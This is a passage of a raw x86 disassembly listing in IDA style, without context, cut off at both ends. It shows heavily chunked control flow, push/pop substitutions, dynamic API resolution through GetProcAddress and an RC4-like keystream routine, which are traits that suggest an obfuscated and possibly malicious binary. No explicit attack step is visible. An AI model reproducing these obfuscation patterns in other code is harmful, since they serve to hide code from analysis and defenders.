mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+64h], eax
push dword_9BCB74
pop eax
mov eax, [eax]
push dword ptr [eax+64h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9BA1C8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B37E8: ; CODE XREF: sub_9AF030+37F8�j
mov [ebp+var_20], 1
mov ecx, [ebp+arg_0]
call sub_9B35A0
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_9AE8BD
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B3804: ; CODE XREF: sub_9B2830+1AF8�j
; DATA XREF: .text:off_9B92BC�o
or eax, 8000h
mov [edi], ax
push 8
push ebx
call sub_9AB11C
push ebx
pop ecx
mov edx, esi
call sub_9ABADC
mov [ebx+esi], eax
add esi, 4
mov [ebp-1Ch], esi
push dword ptr [ebx+4]
pop eax
push eax
mov ecx, [ebx]
push ecx
lea eax, [esi-8]
push edi
call sub_9B6370
push 2000h
pop edi
sub edi, esi
mov [ebp-24h], edi
and edi, 1FFh
mov [ebp-24h], edi
mov dword ptr [ebp-20h], 0
loc_9B3852: ; CODE XREF: sub_9B2830-692E�j
cmp dword ptr [ebp-20h], 4
jge loc_9B4B4C
jmp loc_9ABEF0
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3864 proc near ; CODE XREF: sub_9B037C-4364�p
; sub_9B3984-5EDC�p
var_2074 = dword ptr -2074h
var_2070 = dword ptr -2070h
var_206C = dword ptr -206Ch
var_2068 = dword ptr -2068h
var_2064 = dword ptr -2064h
var_2060 = dword ptr -2060h
var_205C = dword ptr -205Ch
var_2058 = dword ptr -2058h
var_2054 = dword ptr -2054h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2048 = dword ptr -2048h
var_2044 = dword ptr -2044h
var_203D = byte ptr -203Dh
var_203C = byte ptr -203Ch
var_202C = dword ptr -202Ch
var_2028 = dword ptr -2028h
var_2024 = byte ptr -2024h
var_2022 = word ptr -2022h
var_2020 = dword ptr -2020h
var_201C = byte ptr -201Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 009AB02C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AB16C SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009ABA28 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AC608 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009ACC3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009ACED0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD1DC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AD3DC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AD9F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009ADEE0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AE0D3 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009AE2AC SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AE83C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AEB8C SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AF0F8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AF430 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AF480 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF76C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF808 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AF870 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AFC90 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B0068 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009B01F8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B0D78 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B13E4 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B198C SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B2690 SIZE 00000049 BYTES
; FUNCTION CHUNK AT 009B28CC SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B3374 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009B36C8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B3D6C SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009B4ACC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B52A8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B52B8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5D7C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 009B6488 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAC2D
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
push 205Ch
pop eax
sub esp, 8
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov edi, [ebp+arg_C]
mov [ebp+var_204C], edx
push [ebp+arg_4]
pop esi
mov eax, [ebp+arg_8]
mov [ebp+var_2060], eax
mov [ebp+var_2048], ecx
push [ebp+arg_14]
pop eax
mov [ebp+var_2044], eax
mov [ebp+var_4], 0
mov dword ptr [eax], 0
mov eax, [ebp+arg_10]
push eax
push edi
push esi
push 1
mov ecx, [ebp+arg_0]
push ecx
lea ecx, [ebp+var_203C]
call sub_9B43F4
and eax, eax
jz loc_9AF480
jmp loc_9B198C
sub_9B3864 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B38FC: ; CODE XREF: sub_9B0930+4E4B�j
push off_9BA698
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+0Ch]
mov [ecx+14h], eax
mov edx, dword_9BCB74
mov eax, [edx+0Ch]
mov ecx, [eax+14h]
or ecx, ecx
jz loc_9B23EF
jmp off_9BAB98
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B3930: ; CODE XREF: sub_9B1D80+169�j
movzx edx, word ptr [edi+2]
jmp loc_9AEA72
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B393C: ; CODE XREF: sub_9AC250+92E0�j
; DATA XREF: .text:off_9BB029�o
cmp edi, ebx
jz loc_9B536C
jmp off_9B8908
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B394C: ; CODE XREF: sub_9B03E8+27F7�j
mov al, [ebp-0ACh]
mov byte ptr dword_9BF380+2, al
mov cl, [ebp-0A8h]
mov byte ptr dword_9BF380+3, cl
mov dx, [ebp-0A4h]
mov word ptr dword_9BF384, dx
cmp dword ptr [ebp-0A0h], 2
jnz loc_9B56A0
jmp off_9B9775
; END OF FUNCTION CHUNK FOR sub_9B03E8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3984 proc near ; DATA XREF: .text:off_9B9099�o
var_4058 = dword ptr -4058h
var_4054 = dword ptr -4054h
var_4050 = dword ptr -4050h
var_404C = dword ptr -404Ch
var_4048 = dword ptr -4048h
var_4044 = byte ptr -4044h
var_4034 = byte ptr -4034h
var_4024 = byte ptr -4024h
var_4022 = byte ptr -4022h
var_2020 = word ptr -2020h
var_201E = byte ptr -201Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009AB89C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009ABDA0 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009ABE1C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AD8BC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009ADA80 SIZE 00000041 BYTES
; FUNCTION CHUNK AT 009AE544 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009AFB83 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B102C SIZE 00000006 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAF12
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push 4040h
pop eax
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
mov [ebp+var_4058], eax
push dword ptr [eax+0Ch]
pop ebx
mov [ebp+var_4], 0
lea edi, [ebp+var_4044]
lea eax, [ebp+var_4034]
push ebx
pop esi
call sub_9AC128
sub esi, esi
loc_9B39EA: ; CODE XREF: sub_9B3984-2957�j
mov [ebp+var_4048], esi
cmp esi, 7D0h
jge loc_9AB89C
jmp loc_9AD8BC
sub_9B3984 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B3A04: ; CODE XREF: sub_9B4950-6DA6�j
; DATA XREF: .text:off_9B9CF7�o
cmp dword_9BEC20[eax], ebx
jnz loc_9B3BE0
jmp loc_9B20B4
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B3A18: ; CODE XREF: sub_9B0930-385E�j
push off_9B90A1
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop ecx
mov [ecx+38h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
push dword ptr [eax+38h]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp loc_9AF818
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B3A50: ; CODE XREF: sub_9B4FD0-5E3B�j
; DATA XREF: .text:off_9BA40C�o
lea eax, [ecx+ecx*2]
shl eax, 4
cmp dword_9BBF74[eax], esi
jz loc_9AB8C4
jmp loc_9B3C54
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B3A68: ; CODE XREF: sub_9AC6DC+378A�j
; DATA XREF: .text:off_9B9F24�o
jb loc_9B1568
jmp loc_9B24CC
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3A74 proc near ; CODE XREF: sub_9AFF64-2427�p
; sub_9AFF64-23EC�p
; FUNCTION CHUNK AT 009AAE78 SIZE 0000004E BYTES
; FUNCTION CHUNK AT 009AC804 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AD33B SIZE 0000003E BYTES
; FUNCTION CHUNK AT 009AED9C SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B03C8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B6244 SIZE 0000001D BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B94F8
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 120h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
mov edi, edx
mov esi, ecx
push dword ptr [ebp+8]
pop ebx
push dword ptr [ebp+0Ch]
pop eax
mov [ebp-12Ch], eax
xor eax, eax
mov [ebp-124h], eax
mov [ebp-128h], eax
push dword_9BCB74
pop ecx
mov edx, [ecx]
push off_9BADC8
call dword ptr [edx+18h]
mov dword ptr [ebp-4], 0
push esi
pop ecx
call sub_9B3D1C
mov esi, eax
mov [ebp-130h], esi
test esi, esi
jz loc_9B624E
jmp off_9BAC90
sub_9B3A74 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
loc_9B3B08: ; CODE XREF: .text:009B2ACE�j
; DATA XREF: .text:off_9BACBA�o
push 1
pop eax
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9B3B10: ; CODE XREF: sub_9B43F4-6EA3�j
mov dword ptr [ebp-1Ch], 1
jmp loc_9ACEAF
; END OF FUNCTION CHUNK FOR sub_9B43F4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3B1C proc near ; CODE XREF: sub_9B1584-276F�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AC0C4 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B13C0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B1D3F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B49FC SIZE 00000051 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8E0C
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov eax, dword_9BCB74
mov ecx, [eax]
call dword ptr [ecx+30h]
mov dword_9BEBD8, eax
push 1
mov edx, off_9B989B
push 18h
pop ecx
call sub_9B4480
or eax, eax
jnz loc_9B13C0
jmp loc_9B49FC
sub_9B3B1C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B3B78: ; CODE XREF: sub_9AF25C+6DD4�j
; DATA XREF: .text:off_9B89D3�o
xor ebx, ebx
cmp [ebp+0Ch], ebx
jz loc_9AB9D0
jmp off_9B9F66
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B3B8C: ; CODE XREF: sub_9AC6DC+4D�j
; DATA XREF: .text:off_9B974F�o
cmp esi, ebx
jz loc_9AC3D0
jmp off_9B9E76
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9B3B9C: ; CODE XREF: sub_9AFB1C+1DC6�j
mov cl, [edi+eax]
mov [esi+18h], cl
inc eax
mov [ebp-1Ch], eax
mov dx, [edi+eax]
mov [esi+1Ah], dx
add eax, 2
mov [ebp-1Ch], eax
lea ecx, [edi+eax]
mov [esi+1Ch], ecx
movzx edx, dx
add eax, edx
mov [ebp-1Ch], eax
jmp loc_9B02CB
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B3BC8: ; CODE XREF: sub_9B4950-2890�j
mov dword_9BEC1C[eax], ebx
mov dword_9BEC2C[eax], ebx
mov dword_9BEC30[eax], ebx
mov dword_9BEC28[eax], ebx
loc_9B3BE0: ; CODE XREF: sub_9B4950-6DAC�j
; sub_9B4950-2896�j ...
inc ecx
jmp loc_9B2958
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3BE8 proc near ; CODE XREF: sub_9ABE84+49�p
; sub_9B4FD0-1EE4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009AAF7C SIZE 00000020 BYTES
push esi
push 3
call sub_9B4CF4
add esp, 8
push esi
pop eax
lea edx, [eax+1]
loc_9B3BF8: ; CODE XREF: sub_9B3BE8+15�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_9B3BF8
jmp off_9B9E72
sub_9B3BE8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB3B0
loc_9B3C08: ; CODE XREF: sub_9AB3B0+491�j
push edx
pop ecx
push eax
pop esi
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_9B3C1B: ; CODE XREF: sub_9AB3B0+8871�j
mov al, [edi+1]
inc edi
or al, al
jnz short loc_9B3C1B
jmp off_9B997C
; END OF FUNCTION CHUNK FOR sub_9AB3B0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B3C2C: ; CODE XREF: sub_9B1D80-189E�j
push dword ptr [ebp-2028h]
pop ebx
mov [ebp-2060h], ebx
mov esi, [ebp+14h]
call sub_9B45AC
sub edx, edx
cmp esi, 6
jnz loc_9AC764
jmp loc_9AB684
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B3C54: ; CODE XREF: sub_9B4FD0-156E�j
push dword ptr [ebp+0Ch]
pop edx
cmp dword_9BBF78[eax], edx
jnz loc_9AB8C4
jmp loc_9AFED8
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3C6C proc near ; CODE XREF: sub_9B2118-1B4E�p
mov eax, dword_9BCB74
mov ecx, [eax]
push edi
push off_9BA623
call dword ptr [ecx+68h]
push dword_9BCB74
pop edx
mov eax, [edx]
push off_9BADC8
call dword ptr [eax+68h]
push 300h
pop ecx
mov edi, off_9B87C3
sub eax, eax
rep stosd
mov dword_9BBE3C, eax
mov dword_9BBD2C, eax
mov dword_9BBD30, eax
pop edi
retn
sub_9B3C6C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B14CC
loc_9B3CB0: ; CODE XREF: sub_9B14CC+44�j
; DATA XREF: .text:off_9B8E79�o
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+68h]
call sub_9AEBB8
xor eax, 8E4DA1E7h
mov dword_9BBD28, eax
call sub_9B5FC0
mov dword ptr [ebp-1Ch], 1
jmp loc_9B4783
; END OF FUNCTION CHUNK FOR sub_9B14CC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B3CE4: ; CODE XREF: sub_9B1D80+7D�j
xor ecx, ecx
mov eax, ebx
mov [eax], ecx
mov [eax+4], ecx
mov [eax+8], ecx
mov [eax+0Ch], ecx
loc_9B3CF3: ; CODE XREF: sub_9B1D80+77�j
push dword ptr [ebp+18h]
pop ecx
push ecx
mov eax, [ebp+14h]
push eax
push edi
push 0
push dword ptr [ebp+8]
pop ecx
push ecx
lea ecx, [ebp-203Ch]
call sub_9B43F4
and eax, eax
jz loc_9B3ECB
jmp loc_9B52D0
; END OF FUNCTION CHUNK FOR sub_9B1D80
; =============== S U B R O U T I N E =======================================
sub_9B3D1C proc near ; CODE XREF: sub_9B3A74+70�p
; sub_9AF25C+4CF6�p
; FUNCTION CHUNK AT 009B1450 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B17E4 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B4C94 SIZE 0000001C BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B9095
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
mov ebx, ecx
xor esi, esi
mov [ebp-1Ch], esi
mov [ebp-4], esi
push dword ptr [ebx]
pop ecx
call sub_9B2160
mov [ebp-1Ch], eax
cmp eax, esi
jz loc_9B1464
jmp off_9BA443
sub_9B3D1C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B3D6C: ; CODE XREF: sub_9B3864-3FEC�j
push 0
push 0
push 0
push 0
push 0
push ebx
loc_9B3D77: ; CODE XREF: sub_9B3864-596C�j
push 0
loc_9B3D79: ; CODE XREF: sub_9B3864-6982�j
; sub_9B3864-4CB4�j ...
push dword ptr [esi+4]
pop esi
push edi
call sub_9AB040
push eax
mov edx, [ebp+var_2044]
push 0
push [ebp+var_2048]
pop eax
push edx
push eax
call sub_9B2F1C
add esp, 30h
jmp loc_9AE0D3
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B3DA4: ; CODE XREF: sub_9AC32C+9AFA�j
pop edi
pop esi
pop ebp
push 2
pop eax
pop ebx
add esp, 314h
retn 8
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9B3DB4: ; CODE XREF: sub_9B43F4-3F1E�j
; DATA XREF: .text:off_9BA080�o
sub eax, eax
mov ax, [esi+8]
mov [ebp-24h], eax
push eax
pop ecx
and ecx, 1
cmp [ebp+0Ch], ecx
jnz loc_9ACEAF
jmp off_9B91D0
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9B3DD8: ; CODE XREF: sub_9B4480-2F1E�j
cmp [ebp+var_32C], ebx
jnz loc_9AE273
jmp loc_9AE268
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9B3DF0: ; CODE XREF: sub_9AFF64-23D9�j
cmp eax, edi
jnz loc_9ACBD4
jmp off_9BAEA5
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B3E00: ; CODE XREF: sub_9B0930+4C�j
; DATA XREF: .text:off_9B9429�o
push off_9B8EA0
push eax
push GetProcAddress
pop esi
call esi
push eax
pop edi
mov [ebp-24h], edi
test edi, edi
jz loc_9B23EF
jmp loc_9AE584
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3E24 proc near ; CODE XREF: sub_9AF25C+4D14�j
push ebx
push ebx
push ebx
push ebx
mov ecx, [edi]
sub ecx, 240h
push dword ptr [edi+48h]
pop eax
add eax, 40h
push eax
push 1
call sub_9AFC28
jmp loc_9AB9C8
sub_9B3E24 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B3E44: ; CODE XREF: sub_9B0930-3FA1�j
; DATA XREF: .text:off_9BA378�o
push off_9B9848
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+10h]
mov [ecx+30h], eax
mov edx, dword_9BCB74
mov eax, [edx+10h]
mov ecx, [eax+30h]
and ecx, ecx
jz loc_9B23EF
jmp loc_9AD0A4
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3E78 proc near ; CODE XREF: sub_9B4CF4-4E22�j
; DATA XREF: .text:off_9BAA4D�o
; FUNCTION CHUNK AT 009B0DF4 SIZE 0000000C BYTES
push ebx
pop eax
lea edx, [eax+1]
loc_9B3E7D: ; CODE XREF: sub_9B3E78+A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_9B3E7D
jmp loc_9B0DF4
sub_9B3E78 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B3E90: ; CODE XREF: sub_9B0930-27B2�j
; DATA XREF: .text:off_9B8C60�o
push off_9B99B9
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx+4Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+4Ch]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp loc_9ADEAC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B3EC4: ; CODE XREF: sub_9B1D80-55E5�j
; sub_9B1D80-32E0�j ...
push dword ptr [ebp-2040h]
pop ebx
loc_9B3ECB: ; CODE XREF: sub_9B1D80-6D9C�j
; sub_9B1D80-2BAC�j ...
mov edx, [ebp-2048h]
mov dword ptr [edx], 0
test ebx, ebx
jz loc_9B1D5B
jmp off_9BACA8
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B3EE8: ; CODE XREF: sub_9B5904-333C�j
mov esi, ecx
mov [ebp-20h], esi
loc_9B3EED: ; CODE XREF: sub_9B5904-110E�j
cmp esi, 0FFFFFFFFh
jnz loc_9B42F0
jmp off_9BA6DB
; END OF FUNCTION CHUNK FOR sub_9B5904
; =============== S U B R O U T I N E =======================================
sub_9B3EFC proc near ; CODE XREF: sub_9AB1A0-377�p
; sub_9AB7C0+54�p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009AB300 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AD6D0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AD6E0 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 009ADBB0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ADF50 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AE328 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AEA5C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B02E4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B2340 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B374C SIZE 00000006 BYTES
mov eax, [esp+arg_0]
push eax
pop ecx
mov edx, 1
and ecx, 1Fh
shl edx, cl
push eax
pop ecx
shr ecx, 5
and ecx, 7
test dword_9B9604[ecx*4], edx
jnz loc_9AD6E0
jmp off_9B974B
sub_9B3EFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B3F28 proc near ; CODE XREF: sub_9B037C-366C�p
; sub_9B04A8-3272�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 009AAE40 SIZE 00000034 BYTES
push eax
push esi
mov eax, 10h
call sub_9AC32C
test al, 3
jnz nullsub_9
jmp loc_9AAE40
sub_9B3F28 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B3F44: ; CODE XREF: sub_9AC6DC+9ACA�j
; DATA XREF: .text:off_9B9461�o
ja loc_9B003C
jmp loc_9B1E04
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B3F50: ; CODE XREF: sub_9AF25C+4EE2�j
mov ecx, esi
call sub_9B3D1C
mov edi, eax
mov [ebp-28h], edi
loc_9B3F5C: ; CODE XREF: sub_9AF25C-3DDF�j
mov ecx, edi
mov edx, 0Ch
call sub_9AEE5C
test al, 2
jz loc_9B2618
jmp sub_9B3E24
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B3F78: ; CODE XREF: sub_9AF030-759�j
; DATA XREF: .text:off_9BA84C�o
push 1
push edi
call sub_9AF25C
loc_9B3F80: ; CODE XREF: sub_9AF030-75F�j
push [ebp+var_20]
pop eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B3F98: ; CODE XREF: sub_9B174C-3FD�j
; DATA XREF: .text:off_9BA869�o
mov ecx, [ebp+arg_8]
lea edx, [ecx+edi]
cmp edx, eax
ja loc_9B54E8
jmp off_9B987A
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
mov cl, [eax]
inc cl
mov [eax], cl
movzx ecx, cl
mov dl, [eax+ecx+2]
lea ecx, [eax+ecx+2]
push ebx
mov bl, [eax+1]
add bl, dl
mov [eax+1], bl
mov dl, bl
movzx edx, dl
mov bl, [ecx]
mov dl, [eax+edx+2]
mov [ecx], dl
movzx ecx, byte ptr [eax+1]
mov [eax+ecx+2], bl
movzx ecx, byte ptr [eax]
movzx edx, byte ptr [eax+1]
mov bl, [eax+ecx+2]
mov dl, [eax+edx+2]
add dl, bl
movzx ecx, dl
mov al, [eax+ecx+2]
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B3FF8 proc near ; CODE XREF: sub_9B43F4-3F2E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
